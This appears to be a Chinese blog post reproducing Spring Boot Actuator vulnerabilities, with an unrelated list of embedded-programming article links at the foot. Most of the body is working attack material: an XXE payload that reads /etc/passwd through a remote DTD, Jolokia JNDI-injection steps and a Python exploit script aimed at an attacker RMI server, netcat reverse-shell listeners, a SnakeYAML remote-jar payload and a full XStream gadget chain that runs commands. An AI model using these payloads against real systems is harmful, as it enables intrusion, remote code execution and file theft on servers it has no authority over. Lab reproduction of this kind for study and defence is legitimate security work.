Spring Boot漏洞复现
wptr33 2024-12-07 17:45 16 浏览
Spring Boot漏洞复现
复现一下Sprint Boot的一些漏洞
- 环境搭建
Dump环境
Mvn构建项目
启动项目
- 端点信息
路径 描述/autoconfig 提供了一份自动配置报告,记录哪些自动配置条件通过了,哪些没通过/beans 描述应用程序上下文里全部的Bean,以及它们的关系/env 获取全部环境属性/configprops 描述配置属性(包含默认值)如何注入Bean/dump 获取线程活动的快照/health 报告应用程序的健康指标,这些值由HealthIndicator的实现类提供/info 获取应用程序的定制信息,这些信息由info打头的属性提供/mappings 描述全部的URI路径,以及它们和控制器(包含Actuator端点)的映射关系/metrics 报告各种应用程序度量信息,比如内存用量和HTTP请求计数/shutdown 关闭应用程序,要求endpoints.shutdown.enabled设置为true/trace 提供基本的HTTP请求跟踪信息(时间戳、HTTP头等)
- Spring Boot 1.x版本端点在根URL下注册
2.x版本端点移动到/actuator/路径
Jolokia漏洞利用
Jolokia漏洞利用(XXE)
- jolokia/list
查看jolokia/list中存在的 Mbeans,是否存在logback 库提供的reloadByURL方法
- 创建logback.xml和fileread.dtd文件
logback.xml
<?xml version="1.0" encoding="utf-8" ?><!DOCTYPE a [ <!ENTITY % remote SYSTEM "http://x.x.x.x/fileread.dtd">%remote;%int;]><a>&trick;</a>
fileread.dtd
<!ENTITY % d SYSTEM "file:///etc/passwd"><!ENTITY % int "<!ENTITY trick SYSTEM ':%d;'>">
- 将文件上传到公网VPS上并且开启http服务
- 远程访问logback.xml文件
127.0.0.1:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/x.x.x.x!/logback.xml
- 成功利用xxe读取到etc/passwd文件内容
Jolokia漏洞利用(RCE)
- 下载修改RMI服务代码
- 编译打包
mvn clean install
打包成功后创建target目录下生成RMIServer-0.1.0.jar文件
- 修改logback.xml文件内容
<configuration> <insertFromJNDI env-entry-name="rmi://x.x.x.x:1097/jndi" as="appName" /></configuration>
- 把RMIServer-0.1.0.jar文件上传到公网vps上并执行
java -Djava.rmi.server.hostname=x.x.x.x -jar RMIServer-0.1.0.jar
- nc监听
nc -lvp 6666
- 漏洞url上访问
http://127.0.0.1:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/xxx.xxx.xxx.xxx!/logback.xml
- 反弹shell
Jolokia漏洞利用(RCE-createJNDIRealm方法)
查看/jolokia/list 中存在的是否存在org.apache.catalina.mbeans.MBeanFactory类提供的createJNDIRealm方法,可能存在JNDI注入,导致远程代码执行
- python执行脚本
import requests as reqimport sysfrom pprint import pprinturl = sys.argv[1] + "/jolokia/"pprint(url)#创建JNDIRealmcreate_JNDIrealm = { "mbean": "Tomcat:type=MBeanFactory", "type": "EXEC", "operation": "createJNDIRealm", "arguments": ["Tomcat:type=Engine"]}#写入contextFactoryset_contextFactory = { "mbean": "Tomcat:realmPath=/realm0,type=Realm", "type": "WRITE", "attribute": "contextFactory", "value": "com.sun.jndi.rmi.registry.RegistryContextFactory"}#写入connectionURL为自己公网RMI service地址set_connectionURL = { "mbean": "Tomcat:realmPath=/realm0,type=Realm", "type": "WRITE", "attribute": "connectionURL", "value": "rmi://x.x.x.x:1097/jndi"}#停止Realmstop_JNDIrealm = { "mbean": "Tomcat:realmPath=/realm0,type=Realm", "type": "EXEC", "operation": "stop", "arguments": []}#运行Realm,触发JNDI 注入start = { "mbean": "Tomcat:realmPath=/realm0,type=Realm", "type": "EXEC", "operation": "start", "arguments": []}expoloit = [create_JNDIrealm, set_contextFactory, set_connectionURL, stop_JNDIrealm, start]for i in expoloit: rep = req.post(url, json=i) pprint(rep.json())
- 运行RMI服务
java -Djava.rmi.server.hostname=x.x.x.x -jar RMIServer-0.1.0.jar
- nc 监听
nc -lvp 6666
- python发送请求
python exp.py http://127.0.0.1:8090
- 反弹shell
env端点利用
SpringBoot env 获取* 敏感信息
如果Spring Cloud Libraries在路径中,则'/env'端点会默认允许修改Spring环境属性。 “@ConfigurationProperties”的所有bean都可以进行修改和重新绑定。
- 例如要获取PID(这是假设,假设PID为**)
- 修改enveureka.client.serviceUrl.defaultZone属性
- nc监听
- refresh
- base64解码获取属性
spring Cloud env yaml利用
当spring boot使用Spring Cloud 相关组件时,会存在spring.cloud.bootstrap.location属性,通过修改 spring.cloud.bootstrap.location 环境变量实现 RCE
- 利用范围
Spring Boot 2.x 无法利用成功 Spring Boot 1.5.x 在使用 Dalston 版本时可利用成功,使用 Edgware 无法成功 Spring Boot <= 1.4 可利用成功
- 下载exp修改执行命令
https://github.com/artsploit/yaml-payload
- 将java文件进行编译
javac src/artsploit/AwesomeScriptEngineFactory.javajar -cvf yaml-payload.jar -C src/ .
- 创建yaml文件并放到公网
!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[!!java.net.URL ["http://xxx.xxx.xxx.xxx:8000/yaml-payload.jar"] ]]]
- 修改 spring.cloud.bootstrap.location为外部 yml 配置文件地址
- 请求 /refresh 接口触发
- 执行命令成功
xstream反序列化
- 前提条件
Eureka-Client <1.8.7(多见于Spring Cloud Netflix)
- 在VPS创建xstream文件,使用flask返回application/xml格式数据
from flask import Flask, Responseapp = Flask(__name__)@app.route('/', defaults={'path': ''})@app.route('/<path:path>', methods = ['GET', 'POST'])def catch_all(path): xml = """<linked-hash-set> <jdk.nashorn.internal.objects.NativeString> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>命令</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next>foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> </is> </dataSource> </dataHandler> </value> </jdk.nashorn.internal.objects.NativeString></linked-hash-set>""" return Response(xml, mimetype='application/xml')
- 启动服务
python3 flask_xstream.py
- 写入配置
- 刷新触发
- 获取反弹shell
参考
一次曲折的渗透测试之旅
Spring Boot Actuator 漏洞利用
Spring Boot Actuators配置不当导致RCE漏洞复现
相关推荐
- F103C8T6移植FATFS文件系统 版本R0.15
-
STM32F103C8T6芯片在W25Q64上移植FATFS(版本R0.15)实现过程:1、首先完成USART初始化和调试,用于传输信息到串口调试软件。2、完成SPI相关参数配置及调试,用于单片机和存...
- stm32使用MPU6050或ADXL345控制的车辆减速灯
-
本实验例程采用MPU6050六轴运动处理组件...
- STM32F103串口输出prtinf覆盖(stm32printf函数的串口输出)
-
采用正点原子的板子,有如下坑,记录如下:(1)main中应用头文件#include"stdio.h"(2)采用hal进行fputc和fgetc覆盖,如下intfputc(intc...
- STM32 学习8 USART串口通讯与printf重定向
-
一、串口通信介绍STM32F103ZET6包含多个UART、USART串口。...
- 教你如何使用SEGGER RTT优雅的实现日志系统
-
今天开始了BMS系统的软件代码部分的搭建,计划是分成三层:硬件驱动,AFE层和系统应用层。第一步肯定是先把底层的IIC通信调通,CG861xx的IIC通信和TI的BQ769X0...
- 终极调试利器,各种Link通吃(link4a调制方式)
-
今天继续更新一期KEIL调试方法。事实上,关于调试方法,鱼鹰写了一个系列,汇总文为《佛祖保佑,永无BUG,永不修改|KEIL调试系列总结篇》,对于KEIL方法感兴趣的可以看看。这个调试...
- 在 STM32 中使用 printf() 函数,别漏掉这几行代码!
-
问:在STM32上轻松使用printf函数除了点亮LED外,向串行控制台发送打印信息可能是调试嵌入式项目时最简单、最直接且最常用的技术。虽然大多数平台都拥有可以在UART总线上传输数据的API,但它们...
- 高性能异步io机制:io_uring(异步io select)
-
io_uring是linux内核5.10引入的异步io接口。相比起用户态的DPDK、SPDK,io_uring作为内核的一部分,通过mmap的方式实现用户和内核共享内存,并基于m...
- 精品博文ARM中打印函数print 的几种实现方法
-
1利用C库函数printf步骤:1)首先需要包含头文件stdio.h。2)然后定义文件句柄。实际上就是一个int型变量封装在结构体中。struct__FILE{inthandle;};3)定...
- C语言char的详解(c语言(char))
-
在C语言中,char是一种基础数据类型,用于表示字符或小整数值。对char的理解和处理非常重要,尤其是在字符串操作、文件读写或其他需要直接控制内存的应用场景中。下面从基本定义、存储方式、常见用法...
- C语言之文件操作(c语言文件操作实验总结)
-
文件操作是C语言中非常重要的功能,用于读取和写入文件中的数据。C语言提供了一组标准库函数(如fopen、fclose、fread、fwrite等)来实现文件操作。以下是针对C语言初学者的详细讲解。...
- STM32-ADC如何把采集的数据转换为小数
-
编辑一、代码原理解析这段代码围绕“STM32中ADC数据采集、整数与小数计算及串口输出”展开,核心是数据类型的使用(unsignedint/signedint/float)、ADC数...
- 循环队列原理及在单片机串口通讯中的应用(二)
-
前言书接上回,前文主要介绍了环形队列的实现原理以及C语言实现及测试过程,本文将回归到嵌入式平台的应用中,话不多说,淦,上干货!...
- STM32编程中printf函数重定向背后的原理
-
在C语言中,printf是一个非常好用的函数,尤其是在程序调试阶段,我们可以通printf打印变量的值来帮助查错。在学习C语言的时候我们的开发环境和运行环境都是PC机,printf函数打印到PC机...
- 一周热门
-
-
C# 13 和 .NET 9 全知道 :13 使用 ASP.NET Core 构建网站 (1)
-
因果推断Matching方式实现代码 因果推断模型
-
git pull命令使用实例 git pull--rebase
-
面试官:git pull是哪两个指令的组合?
-
git 执行pull错误如何撤销 git pull fail
-
git pull 和git fetch 命令分别有什么作用?二者有什么区别?
-
git fetch 和git pull 的异同 git中fetch和pull的区别
-
git pull 之后本地代码被覆盖 解决方案
-
还可以这样玩?Git基本原理及各种骚操作,涨知识了
-
git命令之pull git.pull
-
- 最近发表
- 标签列表
-
- git pull (33)
- git fetch (35)
- mysql insert (35)
- mysql distinct (37)
- concat_ws (36)
- java continue (36)
- jenkins官网 (37)
- mysql 子查询 (37)
- python元组 (33)
- mybatis 分页 (35)
- vba split (37)
- redis watch (34)
- python list sort (37)
- nvarchar2 (34)
- mysql not null (36)
- hmset (35)
- python telnet (35)
- python readlines() 方法 (36)
- munmap (35)
- docker network create (35)
- redis 集合 (37)
- python sftp (37)
- setpriority (34)
- c语言 switch (34)
- git commit (34)